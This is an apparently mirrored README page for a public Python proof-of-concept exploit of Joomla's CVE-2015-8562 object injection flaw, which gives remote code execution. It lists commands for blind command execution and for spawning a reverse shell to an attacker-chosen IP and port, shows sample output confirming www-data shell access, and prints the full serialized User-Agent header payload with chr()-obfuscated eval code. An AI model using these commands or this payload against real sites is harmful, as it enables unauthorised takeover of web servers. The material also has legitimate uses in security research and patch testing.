python>> Joomla_CVE-2015-8562>> 返回
项目作者: VoidSec

项目描述 :
A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)
高级语言: Python
项目地址: git://github.com/VoidSec/Joomla_CVE-2015-8562.git
创建时间: 2017-09-17T15:03:53Z
项目社区:https://github.com/VoidSec/Joomla_CVE-2015-8562
开源协议:
下载


Joomla_CVE-2015-8562

A proof of concept for Joomla’s CVE-2015-8562 vulnerability (Object Injection RCE)

Intro/Changelog

This PoC is the second version of the implementation hosted at exploit-db.

  1. -Fixed (regenerate session)
  2. -Added the option to switch from X-Forwarded-For to User-Agent method
  3. -Added the option to switch from a python reverse shell to a bash one
  4. -Added catching exception for missing http schema and script termination
  5. -Edited for a better usage, better messages and colors
  6. -TODO: adding msf support

How to Use

  1. git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
  2. cd Joomla_CVE-2015-8562

Blind RCE:

  1. python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
  2. $ touch /tmp/test

Spawn Reverse Shell:

  1. python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
  2. [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://<target_ip>/
  3. [-] Uploading python reverse shell
  4. <Response [200]>
  5. [+] Spawning reverse shell....
  6. <Response [200]>
  7. Listening on [0.0.0.0] (family 0, port 1337)
  8. $ id
  9. uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2015-8562

In December 2015 a new vulnerability was found in Joomla. It allows a remote attacker to exploit PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.

This vulnerability target Joomla 1.5.0 through 3.4.5 and PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13 CVE-2015-6835.

I’ve made this blog post explaining the vulnerability.

This is what the sent header looks like

  1. }__test|O:21:"JDatabaseDriverMysqli":3:{
  2.     s:2:"fc";
  3.     O:17:"JSimplepieFactory":0:{}
  4.     s:21:"\0\0\0disconnectHandlers";
  5.     a:1:{
  6.         i:0;
  7.         a:2:{
  8.             i:0;
  9.             O:9:"SimplePie":5:{
  10.                 s:8:"sanitize";
  11.                 O:20:"JDatabaseDriverMysql":0:{}
  12.                 s:8:"feed_url";
  13.                 s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
  14.                 JFactory::getConfig();
  15.                 exit";
  16.                 s:19:"cache_name_function";
  17.                 s:6:"assert";
  18.                 s:5:"cache";
  19.                 b:1;s:11:"cache_class";
  20.                 O:20:"JDatabaseDriverMysql":0:{}
  21.                 }
  22.             i:1;
  23.             s:4:"init";
  24.             }
  25.         }
  26.     s:13:"\0\0\0connection";
  27.     b:1;
  28. }ýýýý